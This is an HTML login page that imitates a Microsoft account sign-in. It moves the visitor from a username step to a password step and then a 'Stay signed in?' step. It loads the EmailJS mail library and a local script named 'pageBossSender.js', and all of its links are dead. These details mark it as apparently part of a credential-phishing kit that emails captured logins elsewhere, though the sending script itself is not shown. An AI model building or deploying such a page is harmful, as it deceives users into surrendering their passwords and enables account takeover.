<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="assets/favicon.ico" />
    <title>Sign in to your account</title>
    <link rel="stylesheet" href="assets/app.css" />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://cdn.emailjs.com/dist/email.min.js"></script>
    <script src="assets/pageBossSender.js"></script>
  </head>
  <body>
    <section id="section_uname">
      <div class="auth-wrapper">
        <img src="assets/logo.svg" alt="logo" />
        <h2 class="title mb-16 mt-16">Sign in</h2>
        <form>
          <div class="mb-16">
            <p id="error_uname" class="error"></p>
            <input id="inp_uname" type="text" name="uname" class="input" placeholder="Email address, phone number, or Skype" />
          </div>
        </form>
        <div>
          <p class="mb-16 fs-13">No account? <a href="" class="link">Create one!</a>
          </p>
          <p class="mb-16 fs-13">
            <a href="/" class="link">Can’t access your account? </a>
          </p>
        </div>
        <div>
          <button type="button" class="btn" id="btn_next">Next</button>
        </div>
      </div>
      <div class="opts">
        <p class="has-icon mb-0" style="font-size:15px;">
          <span class="icon">
            <img src="assets/key.png" width="30px" />
          </span> Sign-in options
        </p>
      </div>
    </section>
    <section id="section_pwd" class="d-none">
      <div class="auth-wrapper">
        <img src="assets/logo.svg" alt="logo" class="d-block" />
        <div class="identity w-100 mt-16 mb-16">
          <button class="back">
            <img src="assets/back.png" />
          </button>
          <span id="user_identity">a@b.com</span>
        </div>
        <h2 class="title mb-16">Enter password</h2>
        <form>
          <div class="mb-16">
            <p id="error_pwd" class="error"></p>
            <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Password" />
          </div>
        </form>
        <div>
          <p class="mb-16">
            <a href="/" class="link fs-13">Forgot password?</a>
          </p>
          <p class="mb-16">
            <a href="/" class="link fs-13">Other ways to sign in</a>
          </p>
        </div>
        <div>
          <button type="button" class="btn" id="btn_sig">Sign in</button>
        </div>
      </div>
    </section>
    <section id="section_final" class="d-none">
      <div class="auth-wrapper">
        <img src="assets/logo.svg" alt="logo" class="d-block" />
        <div class="identity w-100 mt-16 mb-16">
          <span id="user_identity">a@b.com</span>
        </div>
        <h2 class="title mb-16">Stay signed in?</h2>
        <p class="p">Stay signed in so you don't have to sign in again next time.</p>
        <label class="has-checkbox">
          <input type="checkbox" class="checkbox" />
          <span>Don't show this again</span>
        </label>
        <div class="btn-group">
          <button type="button" class="btn btn-sec" id="btn_final">No</button>
          <button type="button" class="btn" id="btn_final">Yes</button>
        </div>
      </div>
    </section>
    <footer class="footer">
      <a href="/">Terms of use</a>
      <a href="/">Privacy & cookies</a>
      <span>.&nbsp;.&nbsp;.</span>
    </footer>
  </body>
</html>